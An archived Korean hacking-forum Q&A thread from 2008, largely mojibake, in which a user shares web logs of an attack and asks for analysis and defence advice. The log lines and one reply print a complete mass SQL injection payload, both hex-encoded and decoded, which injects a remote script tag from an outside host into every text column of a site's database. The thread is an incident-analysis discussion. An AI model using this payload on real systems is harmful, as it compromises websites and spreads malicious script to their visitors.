Å©·¡Å· ÇÇÇØ

 423, 3/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   youngman0707
   sqlÀÎÁ§¼Ç¹®Á¦Àä...ÄÚµåºÐ¼®Á¡ ºÎŹµå¸³´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=382 [º¹»ç]


%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20AnD%20''=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0%20And%20'%25'=' - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
';dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);-- - 122.45.18.42 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) ASPSESSIONIDCQCSDCSB=OBFDPLNCPMBGDLJKJNOHNIBO 200
%25'%20;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F732E6361776A622E636F6D2F732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--%20aNd%20'%25'=

  Hit : 3761     Date : 2008/11/10 03:27



    
youngman0707 Á¦°¡ Áö½ÄÀ̾è¾Æ¼­ ..ÀÌ·±°Å¹ß»ýÇßÀ»¶§..¾î¶»°Ô ºÐ¼®..±×¸®°í º¸¾ÈÇؾߵǴÂÁö ..°í¼ö´ÔµéÀÇ Àâ´ÙÇÑ
ÇѸ»¾¹ºÎŹµå¸³´Ï´Ù..

Àâ´ÙÇÑ ÇѸ»¾¹ÀÌ Àú¿¡°Õ Å«ÈûÀ̵˴ϴÙ..
¿À´Ãµµ Áñ°Å¿î ÇϷ纸³»¼¼¿ä..
2008/11/10  
ÃʵùÇØÄ¿ ÈÉ..
ÄO¾Æ
Âü Çè³­Çϱ¸³ª..

ÄO phpÁ» ÇÒÁپ˾Æ?
<?
echo(urldecode("$str"));
?>

À§ ÀÌ»óÇÑ ¹®ÀÚ¿­À» ¿ä±â $str ÀÎÀÚ·Î Àü´ÞÇϸé Á» ¸¶À½ÀÌ ¾ÈÁ¤µÉ²¿¾ß
2008/11/10  
pr0sp3r Çì´õºÎºÐÀº ³¯¸®°í ½ÇÁ¦ °ø°Ý Äõ¸®´Â 0xºÎÅÍ Çí»ç°ªº¯Á¶ÈÄ urndecode Çϸé¾Æ·¡¿Í °°ÀÌ µË´Ï´Ù.<br />
<br />
%' ;dEcLaRe @S VaRcHaR(4000) SeT @s=DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE [' @T '] SET [' @C ']=RTRIM(CONVERT(VARCHAR(4000),[' @C '])) ''<script src=http://s.cawjb.com/s.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Curso aS VaRcHaR(4000));eXeC(@s);-- aNd '%'=
2008/11/11  
k1rha ¿äÁò ÀÌÄÚµå Á¤¸» ÀÚÁÖº¸°Ô µÇ³×¿ä ¤»¤» mass sql injection °ø°ÝÀä, ½ÇÁ¦·Î ¹æ¾î¹ýÀº ¿øõÀûÀ¸·Î sql injection ¹æ¾î¹ý°ú °°½À´Ï´Ù¸¸, mass sql ÀÇ È­µÎ°¡ µÈÀÌÀ¯´Â IDS IPS ¸¦ ¿ìȸ ÇÒ¼ö ÀÖ´Ù´Â Á¡ÀÔ´Ï´Ù. ÀÌÁ¡À» ºñ·ÔÇØ ¹æ¾î¹ýÀ» ¼³¸íµå¸®ÀÚ¸é ÇÊÅ͸µ ±¸¹®¿¡ mass sql ¸¸ÀÇ ±¸¹®À» ÇÊÅ͸µ ÇØÁÖ¸é µÈ´Ù°í ÇÏ´õ±º¿ä ... 2008/11/14  
383   Á¦°¡ »ç±â¸¦´çÇߴµ¥¿ä.[9]     zzz2238
02/02 3883
382   Áß±¹¿¡µé Å©·¹Å·¿¡ ´ëÇؼ­[9]     zzaog
01/04 4428
381   Å©·¡Å· ÇÇÇØ ¸¦ ´çÇß½À´Ï´Ù ![6]     zzangon7
07/29 3801
380   À¥ÇØÅ·ÀÌ Á¤È®ÀÌ ¹«½¼ ¶æÀΰ¡¿ä?     zoo440
09/22 3640
379   ±ÛÀÚ³ª »çÁøµî ¹Ù²ã³õ´Â ÇØÅ·±â¹ýÀ» ¹¹¶óÇϳª¿ä?[2]     zoo440
09/28 3641
378   ¿©·¯ºÐ µµ¿ÍÁÖ¼¼¿ä!!! µµ¿òÀÌÇÊ¿äÇØ¿ä..¤Ð¤Ð[5]     znzkzk51
06/07 3539
377   Áú¹®ÀÖ¾î¿ä..[7]     zksntm
09/22 3348
376   Á¦°¡ .. ÇØÄ¿ ÇÑÅ× ´çÇߴµ¥¿ä .. Áö±Ý IP µµ µûÀÎ »óÅÂ¶ó ¸¶¿ì½º¶û Å°º¸µå°¡ ..[7]     zjafkays
07/06 5321
375   Ä£±¸ÄÄ ÇØÅ·ÇÒ·Á¸é..¤»¤»[20]     ysjplus
03/14 5977
  sqlÀÎÁ§¼Ç¹®Á¦Àä...ÄÚµåºÐ¼®Á¡ ºÎŹµå¸³´Ï´Ù..[4]     youngman0707
11/10 3760
373   ¸®¹ö½ºÅÚ³Ý ¿¡ °üÇÏ¿©[3]     youn5lee
03/23 4608
372   Æ÷Æ® °Ë»ç ÇÒ·Á¸é?[2]     youn5lee
04/13 3882
371   ÆÄÀÏÀÌ Áö¿öÁöÁö ¾Ê¾Æ¿ä -¤±-[4]     yl
12/08 3594
370   ·çÆ® ±Çȯ ʼnµæ Áú¹®..[3]     ykm930
08/30 3760
369   »¡¸®Á¡ ¤»[3]     yfff
03/05 3493
368   ÀͽºÇ÷¯ ÇØÅ· ±â¹ý ¹æ¾î[3]     ycg01176
06/11 3688
367   ¾È¾²´Â ³ëÆ®ºÏÀÌ Àִµ¥¿ä...¿©±â¼­ Àü¿¡ ¾²´ø ÇÁ·Î±×·¥ÀÇ ºñ¹øÀ» À¯ÃâÇÒ ¼öÀÖ³ª¿ä?[4]     yangsman
10/16 4140
366   Å©·¢ºÎŹ(»ç·Ê)![2]     yamato1
04/14 3874
365   ÇØÅ·ÇÑ´Ù°í ¹®ÀÚ°¡ ¿Ô´Âµ¥¿ä[9]     yakida1940
10/03 4845
364     [re] ÇØÅ·À» ¾î¶² °æ·Î·Î ÇÏ°Ô µÇ´Â °ÇÁö=¤µ=;     X-line
12/18 3833
[1][2] 3 [4][5][6][7][8][9][10]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org